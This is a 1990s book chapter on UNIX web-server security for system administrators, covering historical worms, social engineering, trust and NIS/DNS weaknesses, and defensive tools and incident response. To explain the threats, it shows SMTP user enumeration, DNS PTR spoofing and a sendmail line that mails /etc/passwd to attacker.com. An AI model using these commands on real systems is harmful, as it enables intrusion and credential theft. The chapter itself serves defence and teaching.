Chapter 40

Site Security


CONTENTS


Chapter 17, "How to Keep Portions of the Site Private," tells you what individual Webmasters can do to enhance the security of their Web site. Closing the door to HTTP infiltrators is of little use, however, if infiltrators can penetrate the site through FTP, sendmail, or Telnet. This chapter covers the steps the system administrator can take to make the site more resistant to attack.

Much of the material in this chapter provides explicit tips about how to attack a UNIX system. Some of this material is obsolete (but may still apply to systems that have had recent upgrades). All of this material is already widely disseminated among those people who are inclined to attack systems. The material is provided here so that system administrators can be aware of what kinds of attacks are likely to be made.

Overview

Figure 40.1 shows again the triangle of competing objective introduced in Chapter 17, "How to Keep Portions of the Site Private."

Figure 40.1 : The security-performance-usability triangle.

With few exceptions, every step toward enhanced security is a step away from high performance and usability. Each system administrator, in concert with the Webmasters of the sites on the system, must determine where the acceptable operating points lie.

This chapter focuses on UNIX since most Web sites are hosted on UNIX servers. UNIX is one of the most powerful operating systems in common use and with that power comes vulnerability.

Other operating systems, such as the various members of the Windows family, have somewhat less functionality and are consequently a bit less vulnerable. The Macintosh is unique in that it has no command-line interface so it is more resistant to certain kinds of attack.

Exposing the Threat

Many checks for vulnerability are left undone, even though they are simple and hardly detract from performance and usability. In many cases, the system administrator is unaware of the threat or believes that "it will never happen at my site."

A site need not be operated by a bank or a Fortune 500 company to have assets worth protecting. A site need not be used by the military for war planning to be considered worthy of attack. As the case studies in this section show, sometimes merely being connected to the Internet is enough to cause a site to be infiltrated.

Case Studies

Security needs to be a budgeted item just like maintenance or development. Depending upon the security stance, the budget may be quite small or run to considerable sums. In some organizations, management may need to be convinced that the threat is real. The following case studies illustrate how other sites have been attacked and compromised, as well as government analyses of threats and vulnerabilities.

The Morris Worm

On the evening of November 2, 1988, a program was introduced to the Net. This program collected key information from the site and then broke into other machines using security holes in existing software. Once on a new system, the program would start the process again.

Within hours, a large percentage of the hosts on the Internet were infected. Many system administrators responded by taking their sites offline, ironically making it impossible for them to get the information that told them how to eliminate the program.

The Morris Worm exploited two vulnerabilities. First, the fingerd daemon had a security hole in its input routine. When the input buffer was overflowed with carefully chosen data, the attacker got access to a privileged login shell.

Caution
Any program running as a privileged user should be double-checked to make sure all input is limited to the size of the input buffer.

The second security hole was in sendmail, the UNIX program that routes mail. Sendmail is notoriously difficult to configure, so the developers left a DEBUG feature in place to help system administrators. Many administrators chose to leave DEBUG turned on all the time, which allowed a user to issue a set of commands instead of a user's address.The result: an open door into a privileged shell.

The Morris Worm used several proven techniques to guess passwords. Too many users-indeed, too many system administrators-leave some passwords at vendor defaults. Or they make passwords short, all lowercase, or easy to guess from system or personal information. The off-the-Net program crack can be used by administrators against their own password file to reveal weak passwords.

WANK and OILZ Worms

During October and November 1989, two networks that form part of the Internet came under attack. The SPAN and HEPnet networks included many DEC VAXen running the VMS operating system. The initial attack, called the WANK Worm, targeted these VAXen. It played practical jokes on users, sent annoying messages, and penetrated system accounts.

The WANK Worm attacked only a few accounts on each machine to avoid detection. If it found a privileged account, it would invade the system and start again with systems reachable from the new host.

Within a few weeks, countermeasures were developed and installed that stopped the WANK Worm. The attackers responded with an improved version, called the OILZ Worm. The OILZ Worm fixed some problems with the WANK Worm and added exploitation of the default DECnet account. System administrators who had installed their DECnet software but left the vendor password in place soon found their systems infected.

Ship Sunk from Cyberspace

In March 1991, a ship in the Bay of Biscay was lost in a storm. Intruders had broken into the computers of the European Weather Forecasting Centre in Bracknell, Berkshire, and disabled the weather forecasting satellite that would have warned the crew of the impending storm.

Cancer Test Results Corrupted

In 1993, a group of intruders invaded a medical computer and changed the results of a cancer screening test from negative to positive, leading these people to believe they had cancer.

$10,000,000 Stolen from CitiBank

Banks usually do not divulge major thefts, but security experts estimate that about 36 instances of computer theft of over $1,000,000 occur each year in Europe and the United States. One such case came to light when CitiBank requested the extradition of a cracker in St. Petersburg, Russia, for allegedly stealing more than $10,000,000 electronically.

This case is among those documented by Richard O. Hundley and Robert H. Anderson in their 1994 RAND report "Security in Cyberspace: An Emerging Challenge to Society."

Information Infrastructure Targets Listed

In recent years, the Pentagon has begun to talk seriously about Information Warfare (IW). The U.S. used IW techniques in the Gulf War against Iraq, with devastating success.

The July/August 1993 issue of Wired listed 10 Infrastructure Warfare Targets. At least 3 of these are clearly part of the information infrastructure. In his report "CIS Special Report on Information Warfare" for the Computer Security Institute in San Francisco, Richard Power interviewed Dr. Fred Cohen of Management Analytics (Hudson, Ohio), author of Protection and Security on the Information Superhighway.

Dr. Cohen gave detailed scenarios by which the Culpepper Telephone Switch (which carries all U.S. Federal funds transfers) and the Internet could be disrupted, at least temporarily. Dr. Cohen declined to describe attack strategies against the Worldwide Military Command and Control System (WWMCCS), stating, "It's too vital."

Pentagon and RAND Role-Play an Information War

In 1995, Roger C. Molander and a team of researchers at the RAND Institute conducted a series of exercises based on "The Day After…" methodology. RAND led six exercises designed to crystallize the government's understanding of information warfare.

In the scenario, a Middle East state makes a power grab for an oil-rich neighbor. To keep the U.S. from intervening, they launch an IW attach against the U.S. Computer-controlled telephone systems crash, a freight train and a passenger train are misrouted and collide, and computer-controlled pipelines malfunction, triggering oil refinery explosions and fires.

International funds-transfer networks are disrupted, causing stock markets to plummet. Phone systems and computers at U.S. military bases are jammed, making it difficult to deploy troops. The screens on some of the U.S.'s sophisticated electronic weapons begin to flicker as their software crumbles.

In the scenario, there is no smoking gun that points to the aggressor. The participants in the RAND study were asked to prepare their recommendations for the President in less than an hour. The good news is…

…as system administrators, we need only concern ourselves with keeping our few boxes safe.

Security Awareness

Many security holes can be closed by training staff and users on basic security procedures. Many crackers have acknowledged that it is far simpler to get key information out of human operators than out of technical tricks and vulnerabilities. Here are a few ways crackers can exploit human security holes.

Forgetting Your Password

It has happened to everyone at some point. Returning after some weeks away, logging on to a system that you don't use on a regular basis, you draw a blank. You sit frozen, looking at the blinking cursor and the prompt, Enter Password:.

You were taught, "Never write your password down" and like a good soldier, you obeyed. Now you're locked out, it's 7:00 p.m., and the report due in the morning is on the other side of this digital watchdog.

Faced with this situation, many people call their service provider. Most system administration staff are well-enough trained not to give out the password. Indeed, on UNIX systems they cannot get access to it.

But they will demand some piece of personal information as identification. The mother's maiden name is common. Once they have "identified" the caller to their satisfaction, they reset the password on the account to some known entry such as the username, and give out that password.

Note
One common choice for a password is to set the password to be the same as the username. Thus, the password for account jones might be jones. This practice is so common that it has a name: such accounts are called "joes."
When a user forgets a password, the system operator may set the password so the account is a joe. The user should immediately change the password to something that only he or she knows. Unfortunately, many users don't know how to change their own password, or ignore this guideline and leave their account as a joe. As a result, most systems have at least one joe through which an attacker can gain access.

There are no perfect solutions to this problem. One partial solution may be to encourage people to write their password down in a very private place. There are many stories of accounts being penetrated using the "I lost my password" story. There are no known cases of a password being stolen out of a wallet or purse.

If management decides that they will set the password to a known value on request, develop a procedure to handle the situation. Require something other than the mother's maiden name. Don't give the information to the caller.

Tell them to hang up and call them back at the number on file in the records. Do not accept changes to those records by e-mail. Require that people confirm information about a change of address or phone number by fax or regular mail.

Caution
Never use the same password for two different systems. Instead, use a mnemonic hook that can be tailored for each system. To log into a system called "Everest," use a password like "Mts2Climb." For a system called "Vision," use "Glasses4Me." Even if the system only looks at the first eight characters, the passwords are unique and not easy to crack with a dictionary or a brute force attack.

Physical Security

As the leaders in a paperless society, service providers and in-house system administrators generate a lot of paper. Sooner or later, most of that paper ends up in the trash. Crackers have been known to comb the garbage finding printouts of configurations, listings of source code, even handwritten notes and interoffice memos revealing key information that can be used to penetrate the system.

Other crackers, not motivated to dig through garbage cans, arrange a visit to the site. They may come as prospective clients or to interview for a position. They may hire on as a member of the custodial staff or even join the administrative staff.

Take a page from the military's book. Decide what kinds of documents hold sensitive information and give them a distinctive marking. Put them away in a safe place when not in use. Do not allow them to sit open on desktops. When the time comes for them to be destroyed, shred them.

Maintain a visitor's log. Get positive ID on everyone entering sensitive areas for any reason. Do a background check on prospective employees. Post a physical security checklist on the back of the door. Have the last person out check the building to make sure that doors and windows are locked, alarms set, and sensitive information has been put away. Then have them initial the sign-out sheet.

Caution
If your shop reuses old printouts as scratch paper, make sure that both sides are checked for sensitive information.

Whom Do You Trust?

Most modern computer systems establish a small (and sometimes not so small) ring of hosts that they "trust." This web of trust is convenient and increases usability. Instead of having to log in and provide a password for each of several machines, users can log in to their home machine and then move effortlessly throughout the local network. Clearly there are security implications here.

For example, on UNIX systems there is a file called /etc/hosts.equiv. Any host on that list is implicitly trusted. Some vendors ship systems with /etc/hosts.equiv set to trust everyone. Most versions of UNIX also allow a file called .rhosts in each user's home directory, which works like /etc/hosts.equiv.

The .rhosts file is read by the "r" commands, such as rlogin, rcp, rsh, rexec. When user jones on host A attempts an r-command on host B as user smith, host B looks for a .rhosts file in the home directory of smith. Finding one, it looks to see if user jones of host A is trusted. If so, the access is permitted.

All too often, a user will admit anyone from a particular host or will list dozens of hosts. One report, available at ftp://ftp.win.tue.nl/pub/security/admin- guide-to-cracking.101.Z, documents an informal survey of over 200 hosts with 40,000 accounts. About 10 percent of these accounts had an .rhosts file. These files averaged six trusted hosts each.

Many .rhosts had over 100 entries. More than one had over 500 entries! Using .rhosts, any user can open a hole in security. One can conclude that virtually every host on the Internet trusts some other machine and so is vulnerable.

The author of the report points out that these sites were not typical. They were chosen because their administrators are knowledgeable about security. Many write security programs. In many cases, the sites were operated by organizations that do security research or provide security products. In other words, these sites may be among the best on the Internet.

Whom Do You Trust? Part II

Even if a site has /etc/hosts.equiv and .rhosts under control, there are still vulnerabilities in the "trusting" mechanisms. Take the case of the Network File System, or NFS. One popular book on UNIX says of NFS, "You can use the remote file system as easily as if it were on your local computer." That is exactly correct, and that ease of use applies to the cracker as well as the legitimate user.

On many systems, the utility showmount is available to outside users. showmount -e reveals the export list for a host. If the export list is everyone, all crackers have to do is mount the volume remotely. If the volume has users' home directories, crackers can add a .rhosts file, allowing them to log on at any time without a password.

If the volume doesn't have users' home directories, it may have user commands. Crackers can substitute a Trojan horse-a program that looks like a legitimate user command but really contains code to open a security hole for the cracker. As soon as a privileged user runs one of these programs, the cracker is in.

Tip
Export file systems only to known, trusted hosts. When possible, export file systems read-only. Enforce this rule with users who use .rhosts.

Openings Through Trusted Programs

Recall that the Morris Worm used security holes in "safe" programs-programs that have been part of UNIX for years. Although sendmail has been patched, there are ways other standard products can contribute to a breach.

The finger daemon, fingerd, is often left running on systems that have no need for it. Using finger, a cracker can find out who is logged on. (Crackers are less likely to be noticed when there are few users around.)

Finger can tell a remote user about certain services. For example, if a system has a user www or http, it is likely to be running a Web server. If a site has user FTP, it probably serves anonymous FTP.

If a site has anonymous FTP, it may have been configured incorrectly. Anonymous FTP is run inside a "silver bubble": the system administrator executes the chroot() command to seal off the rest of the system from FTP. Inside the silver bubble, the administrator must supply a stripped-down version of files a UNIX program expects to see, including /etc/passwd.

A careless administrator might just copy the live /etc/passwd into the FTP directory. With a list of usernames, crackers can begin guessing passwords. If the /etc/passwd file has encrypted passwords, all the better. Crackers can copy the file back to their machines and attack passwords without arousing the suspicion of the administrator.

Tip
Make sure that ~ftp and all system directories and files below ~ftp are owned by root and are not writable by any user.

If the system administrator has turned off fingerd, the cracker can exploit rusers instead. rusers gives a list of users who are logged on to the remote machine. Crackers can use this information to pick a time when detection is unlikely. They can also build up a list of names to use in a password-cracking assault.

Systems that serve diskless workstations often run a simple program called tftp-trivial file transfer protocol. tftp does not support passwords. If tftp is running, crackers can often fetch any file they want, including the password file.

The e-mail server is a source of information to the cracker. Mail is transferred over TCP networks using "mail transfer agents" (MTAs) such as sendmail. MTAs communicate using the simple mail transfer protocol (SMTP). By impersonating an MTA, a cracker can learn a lot about who uses a system.

SMTP supports two commands (VRFY and EXPN), which are intended to supply information rather than transfer mail. VRFY verifies that an address is good. EXPN expands a mailing list without actually sending any mail. For example, a cracker knows that sendmail is listening on port 25 and can type:

telnet victim.com 25

The target machine responds

220 dse Sendmail AIX 3.2/UCB 5.64/4.03 ready at 20 Mar 1996 13:40:31 -0600

Now the cracker is talking to sendmail. The cracker asks sendmail to verify some accounts. (-> denotes characters typed by the cracker, and <- denotes the system's response):

->vrfy ftp
<-550 ftp... User unknown: No such file or directory
<-sendmail daemon: ftp... User unknown::No such file or directory

->vrfy trung
<-250 Trung Do x1677 <trung>

->vrfy mikem
<-250 Mike Morgan x7733 <mikem>

Within a few seconds, the cracker has established that there is no FTP user but that trung and mikem both exist. Based on knowledge of the organization, the cracker guesses that one or both of these individuals may be privileged users.

Now the cracker tries to find out where these individuals receive their mail. Many version of sendmail treat expn just like vrfy, but some give more information:

->expn trung
<-250 Trung Do x1677 <trung>

->expn mikem
<-250 Mike Morgan x7733 <mikem@elsewhere.net>

The cracker has established that mikem's mail is being forwarded, and now knows the forwarding address. mikem may be away for an extended period. Attacks on his account may go unnoticed.

Here's another sendmail attack. It has been patched in recent versions of sendmail, but older copies are still vulnerable. The cracker types:

telnet victim.com 25
mail from: "|/bin/mail warlord@attacker.com < /etc/passwd"

Older versions of sendmail would complain that the user was unknown but would cheerfully send the password file back to the attacker.

Another program built into most versions of UNIX is rpcinfo. When run with the -p switch, rpcinfo reveals which services are provided. If the target is an Network Information System (NIS) server, the cracker is all but in-NIS offers numerous opportunities to breach security. If the target offers rexd, the cracker can just ask it to run commands. rexd does not look in /etc/hosts.equiv or .rhosts.

If the server is connected to diskless workstations, rpcinfo shows it running bootparam. By asking bootparam for BOOTPARAMPROC_WHOAMI, crackers get the NIS domainname. Once crackers have the domainnames, they can fetch arbitrary NIS maps such as /etc/passwd.

Security Holes in the Network Information System

The Network Information System (NIS), formerly the Yellow Pages, is a powerful tool and can be used by crackers to get full access to the system. If the cracker can get access to the NIS server, it is only a short step to controlling all client machines.

Tip
Don't run NIS. If you must run NIS, choose a domainname that is difficult to guess. Note that the NIS domainname has nothing to do with the Internet domain name, such as www.yahoo.com.

NIS clients and servers do not authenticate each other. Once crackers have guessed the domainname, they can put mail aliases on the server to do arbitrary things (like mail back the password file). Once crackers have penetrated a server, they can get the files that show which machines are trusted, attack any machine that trusts another.

Even if the system administrator has been careful to prune down /etc/hosts.equiv and has restricted the use of .rhosts, and even if another single machine is trusted, the cracker can spoof the target into thinking it is the trusted machine.

If a cracker controls the NIS master, he edits the host database to tell everyone that the cracker, too, is a trusted machine. Another trick is to write a replacement for ypserv.The ypbind daemon can be tricked into using this fake version instead of the real one.

Since the cracker controls the fake, the cracker can add his or her own information to the password file. More sophisticated attacks rely on sniffing the NIS packets off the Net and providing a faked response.

Still another hole in NIS comes from the way /etc/passwd can be incorrectly configured. When a site is running NIS, it puts a plus sign in the /etc/passwd file to tell the system to consult NIS about passwords. Some system administrators erroneously put a plus sign in the /etc/passwd file that they export, effectively making a new user: '+'.

If the system administrator uses DNS instead of NIS, crackers must work a bit harder. Suppose crackers have discovered that victim.com trusts friend.net. They change the Domain Name Server pointer (the PTR record) on their net to claim that their machine is really friend.net. If the original record says:

1.192.192.192.in-addr.arpa  IN  PTR  attacker.com

they change it to read

1.192.192.192.in-addr.arpa  IN  PTR  friend.net

If victim.com does not check the IP address but trusts the PTR record, victim.com now believe that commands from attacker.com are actually from the trusted friend.net, and the cracker is in.

Additional Resources to Aid Site Security

The current network world has been likened to the wild West. Most people are law-abiding, but there are enough bad guys to keep everyone on their toes. There is no central authority that can keep the peace. Each community needs to take steps to protect itself.

Chapter 17, "How to Keep Portions of the Site Private," tells you what the individual "storekeeper" can do to keep a site secure. This chapter tells you what the system administrator can do. Many of the cracking techniques described in this chapter are obsolete. Newer versions of UNIX have fixed those holes, but new vulnerabilities are being found every day.

This section shows where to turn for more security tips and warnings.

Here are some mailing lists that discuss the topics in this chapter:

subscribe firewalls

For some good ideas on how the military maintains physical security, visit Dave's Dept of the Army Security Stuff site at http://www.ccaws.redstone.army.mil/security/mainsec.htm.

To catch up on the latest security advisories, point your browser at DOE's Computer Incident Advisory Center, http://ciac.llnl.gov/ciac/documents/index.html. This site includes notices from UNIX vendors as well as reports from the field.

http://www.tezcat.com/web/security/security_top_level.html attempts to provide "one-stop shopping" for everything related to computer security. They do a creditable job and are worth a visit.

For an eye-opener about vulnerabilities in your favorite products, visit http://www.c2.org/hacknetscape/, http://www.c2.org/hackjava/, http://www.c2.org/hackecash/, and http://www.c2.org/hackmsoft/.

More general information is available from the Computer Operations and Security Technology (COAST) site at Purdue University: http://www.cs.purdue.edu/coast/coast.html. These are the folks who produce Tripwire.

Danny Smith of the University of Queensland in Australia has written several papers on the topics covered in this chapter. "Enhancing the Security of UNIX Systems" covers specific attacks and the coding practices that defeat them. "Operational Security-Occurrences and Defence" is a summary of the major points of his other papers. These and other papers on this topic are archived at ftp://ftp.auscert.org.au/pub/auscert/papers/.

Rob McMillan, also at the University of Queensland, wrote "Site Security Policy." This paper can be used as the framework within which to write a Computer Security Policy for a specific organization. It is also archived at ftp://ftp.auscert.org.au/pub/auscert/papers/.

Forming an Incident Response Team

Many system administrators are concerned about security but are so overwhelmed by their day-to-day tasks that they have no time to close or tighten vulnerabilities. Their first brush with security comes when someone at another site reports that their system is being used to conduct break-ins.

By then, much damage has been done. Passwords have been stolen and hacked, the NIS domainname is known, Trojan horses have been planted. But the system administrator's day-to-day tasks have not become less, and the security issues still do not get the attention he or she knows they should.

Many sites anticipate these problems by forming an Incident Response Team. These sites close as many vulnerabilities as they can, continually scan logs for evidence of attempted break-ins, and monitor news like the CERT advisories to make sure they benefit from others experience.

When and if they are attacked, the members of the Incident Response Team have the authority and the responsibility to stop the attack and close the security hole. Not incidentally, they serve as the point of contact between the site-owning organization and law enforcement agencies.

Why Form an Incident Response Team?

In his excellent paper, "Forming an Incident Response Team," Danny Smith lists eight reasons to have an Incident Response Team:

IRTs can be formed at the national, corporate, and local levels. The size of the constituency is in part a function of the value of the assets to be protected. A bank may decide to have an IRT for their online services department. A general merchandise vendor can share an IRT with other merchants on their host.

Newly formed IRTs must announce their presence and their mission to their constituency. They can expect lackluster response at best. Many system administrators find it so hard to keep their sites running that they can scarcely imagine keeping their sites secure.

To identify constituent sites, Smith recommends asking each site to register and name a 24-hour contact to be called in case of an emergency. The 24-hour contact may or may not be the same as the "registered site security contact," who is the recipient or security information, including warnings of break-in attempts and notices of security holes.

For obvious reasons, the name of the 24-hour contact must be independently verified. The contact must have the authority to make decisions or to call in key decision-makers regardless of the time of day. The 24-hour contact is often a technically minded person in the organization's security office.

During an investigation, the IRT may have to communicate information about a site's name and configuration to other sites. It is best to get permission to do this ahead of time so that no time is lost when pursuing an attacker.

(For a real-life account of pursuing a cracker in real-time, see Cliff Stoll's Cuckoo's Egg, or Bill Cheswick's "An Evening with Berferd In Which A Cracker Is Lured, Endured, and Studied," available at ftp://ftp.research.au.com/dist/internet_security/berferd.ps.)

Before any incident, the IRT must work out a secure means of communications with the site. If the site has been compromised, it may have disconnected from the Net.

The IRT may have to communicate with a different machine (by encrypted e-mail) or resort to phone or fax. The IRT should also anticipate that an oebercracker may issue false advisories in the name of the IRT to force open a security hole.

Smith has specific recommendations about the size and staffing of the IRT. His experience at Austrailia's SERT leads him to conclude that one full-time staff member can handle about one new incident per day, with 20 open incidents.

He also provides specific guidance relating to budget, policies, and training. His paper is exceptionally complete and is a must- read for anyone setting up an IRT. It also serves as a good beginning for a complete operations manual for such a team.

Smith identifies five potential savings that come from forming an IRT:

Checklist for Site Security

Several good checklists pointing out possible vulnerabilities are available on the Net or in the literature.

File Permissions on Server and Document Roots

Common advice on the Web warns Webmasters not to "run their server as root." This caution has led to some confusion. By convention, Web browsers look at TCP port 80, and only root can open port 80.

So user root must start httpd for the server to offer http on port 80. Once httpd is started, it forks several copies of itself that are used to satisfy clients' requests. These copies should not run as root. It is common instead to run them as the unprivileged user "nobody."

One good practice is to set up a special user and group to own the Web site. Here is one such configuration:

drwxr-xr-x 5 www www     1024 Feb 21 00:01 cgi-bin/
drwxr-x-- 2  www www     1024 Feb 21 00:01 conf/
-rwx------ 1 www www   109674 Feb 21 00:01 httpd
drwxrwxr-x 2 www www     1024 Feb 21 00:01 htdocs/
drwxrwxr-x 2 www www     1024 Feb 21 00:01 icons/
drwxr-x--  2 www www     1024 Feb 21 00:01 logs/

In this example, the site is owned by user "www" of group "www." The cgi-bin directory is world-readable and executable, but only the site administrator can add or modify CGI Scripts. The configuration files are locked away from non-www users completely, as is the httpd binary. The document root and icons are world-readable. The logs are protected.

On some sites, it is appropriate to grant write access to the cgi-bin directory to trusted authors, or to grant read access to the logs to selected users. Such decisions are part of the tradeoff between usability and security discussed in Chapter 17, "How to Keep Portions of the Site Private."

Optional Server Features

Another such tradeoff is in the area of optional server features. Automatic directory listings, symbolic link following, and Server-Side Includes (especially exec) each afford visibility and control to a potential cracker. The site administrator must weigh the needs of security against users' requests for flexibility.

Freezing the System: Tripwire

One common cracker trick is to infiltrate the system as a non-privledged user, change the path so that their version of some common command such as 'ls' gets run by default, and then wait for a privileged user to run his or her command. Such programs, called "Trojan horses," can be introduced to the site in many ways.

Here's one way to defend against this attack. Install a clean version of the operating system and associated utilities. Before opening the site to the Network, run Tripwire, from ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/. Tripwire calculates checksums for key system files and programs.

Print out a copy of the checksums and store them in a safe place. Save a copy to a disk, such as a diskette, that can be write-locked. After the site is connected to the Net, schedule Tripwire to run from the crontab-it will report any changes to the files it watches.

Another good check is to visually inspect the server's access and error logs. Scan for UNIX commands like rm, login, and /bin/sh. Look for anyone trying to invoke Perl. Watch for extremely long lines in URLs.

Chapter 17, "How to Keep Portions of the Site Private," shows how a C or C++ program can have its buffer overflow. Crackers know that a common buffer size is 1,024. They will attempt to send many times that number of characters to a POST script to crash it.

If your site uses access.conf or .htaccess for user authentication, look for repeated attempts to guess the password. Better still, put in your own authenticator, like the one in Chapter 17, and limit the number of times a user can guess the password before the username is disabled.

Checking File Permissions Automatically

The Computer Oracle and Password System (COPS) is a set of programs that report file, directory, and device permissions problems. It also examines the password and group files, the UNIX startup files, anonymous FTP configuration, and many other potential security holes.

COPS includes the Kuang Rule-Based Security Checker, an expert system that tries to find links from the outside world to the superuser account. Kuang can find obscure links. For example, given the goal, "become superuser," Kuang may report a path like:

member workGrp,
write ~jones/.cshrc,
member staff,
write /etc,
replace /etc/passwd,
become root.

This sequence says that if an attacker can crack the account of a user who is a member of group workGrp, the cracker could write to the startup file used by user jones. The next time jones logs in, those commands are run with the privileges of jones.

jones is a member of the group staff who can write to the /etc directory. The commands added to Jones's startup file could replace /etc/password with a copy, giving the attacker a privileged account.

On a UNIX system with more than a few users, COPS is likely to find paths that allow an attack to succeed.

COPS is available at ftp://archive.cis.ohio-state.edu/pub/cops/1.04+.

CRACK

CRACK is a powerful password cracker. It is the sort of program that attackers use if they can get a copy of a site's password file. Given a set of dictionaries and a password file, CRACK can often find 25 to 50 percent of the passwords on a site in just a few hours.

CRACK uses the gecos information in the password file, words from the dictionary, and common passwords like qwerty and drowssap (password spelled backwards). Crack can spread its load out over a network, so it can work on large sites by using the power of the network itself.

CRACK is available at ftp://ftp.uu.net/usenet/comp.sources.misc/volume28.

TAMU Tiger

Texas A&M University distributes a program similar to a combination of COPS and Tripwire. It scans a UNIX system as COPS does, looking for holes. It also checksums system binaries like Tripwire. For extra security, consider using all three-Tiger, COPS, and Tripwire.

Source for various tools in the TAMU security project is archived at ftp://net.tamu. edu/pub/security/TAMU.

xinetd

UNIX comes with a daemon called inetd, which is responsible for managing the TCP "front door" of the machine. Clearly, inetd could play a role in securing a site, but the conventional version of inetd has no provision for user authentication. A service such as Telnet or FTP is either on or off.

To fill this need, Panagiotis Tsirigotis (panos@cs.colorado.edu) developed the
"extended inetd," or xinetd. The latest source is available at ftp://mystique.cs.colorado.edu. The file is named xinetd-2.1.4.tar and contains a README file showing the latest information.

Configuring xinetd

Once xinetd has been downloaded and installed, each service is configured with an entry in the xinetd.conf file. The entries have the form:

service <service_name>
{
 <attribute> <assign_op> <value> <value> ...
}

Valid attributes include

The access control directives are

only_from and no_access take hostnames, IP addresses, and wildcards as values. access_times takes, of course, time ranges. disabled turns the service off completely and disables logging-off attempts.

Tip
Do not use disabled to turn off a service. Instead, use no_access 0.0.0.0. In this way, attempts to access the service are logged, giving early warning of a possible attack.

Detecting Break-In Attempts

As this chapter shows, cracking a system is an inexact art. The cracker probes areas of likely vulnerability. When one of the probes succeeds (and the determined cracker almost always gets in eventually), the first order of business is cleaning up the evidence of the break-in attempts.

By logging unsuccessful attempts and examining the logs frequently, the system administrator can catch some of these break-in attempts and alert the IRT.

After watching the xinetd log for a while, system administrators begins to notice patterns of use, and can design filters and tools to alert them when the log's behavior deviates from the pattern.

For example, a simple filter to detect failed attempts can be built in one line:

grep "FAIL" /var/log/xinetd.log

Each failure line gives the time, the service, and the address from which the attempt was made. A typical pattern for a site with a public httpd server might be infrequent failures of httpd (since it would usually not have any access restrictions) and somewhat more frequent failures of other services.

For example, if the system administrator has restricted Telnet to the time period of 7:00 a.m. to 7:00 p.m., there will be a certain number of failed attempts in the mid-evening and occasionally late at night.

Suppose the system administrator determines that any attempt to Telnet from outside the 199.199.0.0 world is unusual, and more than one failed Telnet attempt between midnight and 7:00 a.m. is unusual. A simple Perl script would split the time field and examine the values, and could also count the number of incidences (or pipe the result out to wc -l).

Another good check is to have the script note the time gap between entries. A maximum allowable gap is site-specific and varies as the day goes on. Large gaps are evidence that some entries may have been erased from the log and should serve as warnings.

Such a script could be put into the crontab, but an attacker is likely to check for security programs there. If the system supports personal crontabs, consider putting this script in the crontab of a random user.

Otherwise, have it reschedule itself using the UNIX batch utility, called at, as described in Chapter 12, "Forms for Batching Processes," or conceal it with an innocuous-sounding name. These techniques make it less likely for a successful cracker to discover the log filter and disable the warning.

Any time the log shows evidence that these warning limits have been violated, the script can send e-mail to the system administrator. The administrator will also want to visually check the log from time to time to make sure the patterns haven't changed.

Catching the Wily Cracker

Sooner or later, it's bound to happen. The xinetd logs show a relentless attack on telnet or ftpd or fingerd. Or worse still, they don't show the attack, but there's an unexplained gap in the log. The site has been penetrated. Now is the time to call the IRT. Depending on what the attacker has done, a call to the appropriate law enforcement agency may also be in order.

To start the investigation, look at the log entries to determine where the attack came from. The log will show an IP address. As this chapter shows, such information can be forged, but knowing the supposed IP is at least a starting point.

To check out an IP address, start with the InterNIC-the clearinghouse for domainnames operated by the U.S. Government. Use Telnet to connect to rs.internic.net. At the prompt, enter whois and the first three octets from the log. For example, if the log says the attack came from 199.198.197.1, enter

whois 199.198.197

This query should return a record showing who is assigned to that address. If nothing useful is revealed, examine higher-level addresses, such as

whois 199.198

Eventually the search should reveal an organization's name. Now at the whois: prompt, enter that name. The record that whois returns will list the names of one or more coordinators. That person should be contacted (preferably by the IRT) so they can begin checking on their end.

Remember that the IP address may be forged, and the organization (and its staff) may be completely innocent. Be careful about revealing any information about the investigation outside official channels, both to avoid tipping the intruder and to avoid slandering an innocent organization.

Remember, too, that any information sent by e-mail can be intercepted by the cracker. The cracker is likely to monitor e-mail from root or from members of the security group.

Even if mail is encrypted, the recipient can be read and a cracker can be tipped off by seeing e-mail going to the IRT. Use the phone or the fax for initial contacts to the IRT, or exchange e-mail on a system that is not under attack.

Work with the IRT and law enforcement agencies to determine when to block the cracker's attempts. Once crackers are blocked, they may simply move to another target or attack again, being more careful to cover their tracks. Security personnel may want to allow the attacks to continue for a time while they track the cracker and make an arrest.

Firewalls

Much has been said in the news media about the use of firewalls to protect an Internet site. Firewalls have their place and, for the most part, they do what they set out to do. Bear in mind that many of the attacks described in this chapter will fly right through a firewall.

Installing a firewall is the last thing to do for site security, in the literal sense. Follow the recommendations given here for making the site secure so that a cracker has to work hard to penetrate security. Then, if further security is desired, install a firewall.

Using this strategy, the system administrator does not get a false sense of security from the firewall. The system is already resistant to attack before the firewall is installed.
Attackers who get through the firewall still have their work cut out for them.

Since most systems will continue to have negligible security for the foreseeable future, one can hope that the cracker who gets through the firewall only to face our seemingly impregnable server will get discouraged and go prey on one of the less-protected systems.

Well, one can always hope.

A firewall computer sits between the Internet and a site, screening or filtering IP packets. It is the physical embodiment of much of a site's security policy. For example, the position taken in the tradeoff between usability and security is called a site's "stance."

A firewall can be restrictive, needing explicit permission before it authorizes a service, or permissive, permitting anything that, has not been disallowed. In this way configuring firewall software is akin to configuring xinetd.

Several designs are available for firewalls. Two popular topologies are the Dual-Homed Gateway and the Screened Host Gateway, illustrated in Figures 40.2 and 40.3, respectively.

Figure 40.2 : Illustration of a Dual-Homed Gateway.

Figure 40.3 : Illustration of a Screened Host Gateway.

The Web server can be run on the bastion host in either topology or inside the firewall with the screened host topology. Other locations are possible but need more complex configuration and sometimes additional software.

Marcus Ranum provides a full description of these and other topologies in his paper, "Thinking About Firewalls," available at ftp://ftp.tis.com/pub/firewalls/firewalls.ps.Z.

Both commercial and free software is available to implement the firewall function. The Firewall Toolkit, available at ftp://ftp.tis.com/pub/firewalls/toolkit/fwtk.tar.Z, is representative.

Security Administrator's Tool for Analyzing Networks

The classic paper on cracking is "Improving the Security of Your Site by Breaking Into it," available online at ftp://ftp.win.tue.nl/pub/security/admin-guide-to-cracking.101.Z.

Dan Farmer and Wietse Venema describe many attacks (some now obsolete). They also propose a tool to automatically check for certain security holds. The tool was ultimately released under the name Security Administrator's Tool for Analyzing Networks (SATAN).

SATAN is an extensible tool. Any executable put into the main directory with the extension .sat is executed when SATAN runs. Information on SATAN is available at http://www.fish.com/satan/.

Once SATAN is installed and started, it "explores the neighborhood" with DNS and a fast version of ping to build a set of targets. It then runs each test program over each target.

When all test passes are complete, SATAN's data filtering and interpreting module analyzes the output, and a reporting program formats the data for use by the system administrator.

See also: http://www.netsurf.com/nsf/latest.focus.html.

Making Sure You Have a Legitimate Version of SATAN

For some functions, SATAN must run with root privilege. One way an infiltrator might break into a system is to distribute a program that masquerades as SATAN or to add .sat tests that actually widen security holes.

